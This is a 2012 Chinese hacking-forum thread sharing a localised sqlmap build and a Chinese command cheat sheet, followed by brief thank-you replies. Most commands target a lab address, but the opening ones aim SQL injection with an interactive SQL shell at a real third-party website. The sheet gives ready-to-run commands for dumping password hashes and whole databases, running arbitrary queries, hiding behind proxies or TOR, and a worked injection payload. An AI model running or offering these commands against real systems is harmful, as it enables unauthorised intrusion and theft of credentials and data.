查看: 89354|回复: 109

[工具专区] sqlmap汉化修正版软件及中文使用说明

  [复制链接]
  • TA的每日心情

    前天 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2012-8-11 15:34:38 | 显示全部楼层 |阅读模式
    sqlmap 是一个自动SQL 注入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库, usernames, 表格, 列, 列举整个DBMS 信息
    支持现在几乎所有的数据库,比国内的任何工具都强。我都开始怀疑穿山甲是不是源自于它。 支持get,post ,cookie注入。可以添加cookie和user-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化算法,更高效。 指纹识别技术判断数据库
    汉化修正版下载地址:

    游客,如果您要查看本帖隐藏内容请回复



    另附上一些简单的中文使用说明,以此纪念影子,愿一切安好。
    [code=PHP]svn checkout http://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

    sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell //执行SQL语句

    sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5 //更详细的信息

    load options from a configuration INI file
    sqlmap -c sqlmap.conf

    使用POST方法提交
    sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method POST --data "id=1"

    使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cookie "id=1" -v 1

    使用referer欺骗
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --referer "http://www.google.com" -v 3

    使用自定义user-agent,或者使用随机使用自带的user-agents.txt
    python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -a "./txt/user-agents.txt"

    使用基本认证
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass" -v 3

    使用Digest认证
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1" --auth-type Digest --auth-cred "testuser:testpass" -v 3

    使用代理,配合TOR
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:3128"
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:8118"

    使用多线程猜解
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 --current-user --threads 3

    绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 -p "id
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 -p "cat,id"
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"

    指定数据库,绕过SQLMAP的自动检测
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"

    * MySQL
    * Oracle
    * PostgreSQL
    * Microsoft SQL Server

    指定操作系统,绕过SQLMAP自动检测
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"

    * Linux
    * Windows

    自定义payload
    Options: --prefix and --postfix

    In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

    Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";:

    $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 -p "id" --prefix "'" --postfix "AND 'test'='test"

    [...]
    [hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
    [hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
    [hh:mm:16] [TRAFFIC OUT] HTTP request:
    GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
    %28%27test%27=%27test HTTP/1.1
    Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    Host: 192.168.1.121:80
    Accept-language: en-us,en;q=0.5
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
    image/png,*/*;q=0.5
    User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
    Connection: close
    [...]
    [hh:mm:17] [INFO] GET parameter 'id' is custom injectable
    [...]

    As you can see, the injection payload for testing for custom injection is:

    id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

    which URL decoded is:

    id=1') AND 7433=7433 AND ('test'='test

    and makes the query syntatically correct to the page query:

    SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

    In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

    页面比较
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "<td>lu[\w][\w]er" -v

    排除网站的内容
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"

    多语句测试,php内嵌函数mysql_query(),不支持多语句
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1

    union注入测试
    python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --union-test -v 1

    unionz注入配合orderby
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1

    python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs

    fingerprint
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f
    python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b

    判断当前用户是否是dba
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1

    列举数据库用户
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --users -v 0

    列举数据库用户密码
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --passwords -U sa -v 0

    查看用户权限
    python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --privileges -U postgres -v 0

    列数据库
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dbs -v 0

    列出指定数据库指定表的列名
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --columns -T users -D test -v 1

    列出指定数据库的指定表的指定列的内容
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump -T users -D master -C surname -v 0

    指定列的范围从2-4
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump -T users -D test --start 2 --stop 4 -v 0

    导出所有数据库,所有表的内容
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0

    只列出用户自己新建的数据库和表的内容
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump-all --exclude-sysdbs -v 0

    sql query
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-query "SELECT usename FROM pg_user" -v 0
    python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1

    SELECT usename, passwd FROM pg_shadow ORDER BY usename

    保存和恢复会话
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 1 -s "sqlmap.log"

    保存选项到INC配置文件
    python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 1 --save[/code]
    回复

    使用道具 举报

  • TA的每日心情

    2015-8-10 09:55
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2012-8-11 16:30:56 | 显示全部楼层
    非常强大的玩意
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-8-11 17:31:15 | 显示全部楼层
    支持下吧!这款工具非常强大
    回复 支持 1 反对 0

    使用道具 举报

    该用户从未签到

    发表于 2012-8-11 19:14:54 | 显示全部楼层
    支持一下  ^^^
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-8-11 23:07:25 | 显示全部楼层
    sqlmap灰常的强大  谢谢提供
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2016-5-30 09:59
  • 签到天数: 9 天

    [LV.3]偶尔看看II

    发表于 2012-8-12 09:38:29 | 显示全部楼层
    sqlmap 上次看一篇技术帖有提到过这个工具  但是没怎么注意  没想到这么强大!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    难过
    2023-10-11 00:17
  • 签到天数: 20 天

    [LV.4]偶尔看看III

    发表于 2012-8-12 10:04:12 | 显示全部楼层
    来拿东西.魂魄支持90工作
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-3-23 21:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2012-8-13 10:25:51 | 显示全部楼层
    看一下  嘿嘿  
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-8-13 11:54:41 | 显示全部楼层
    谢谢提供,{:soso_e181:}
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2020-9-20 14:28
  • 签到天数: 113 天

    [LV.6]常住居民II

    发表于 2012-8-29 11:04:57 | 显示全部楼层
    这么强大的工具当然要啦
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-15 06:59 , Processed in 0.027169 second(s), 11 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部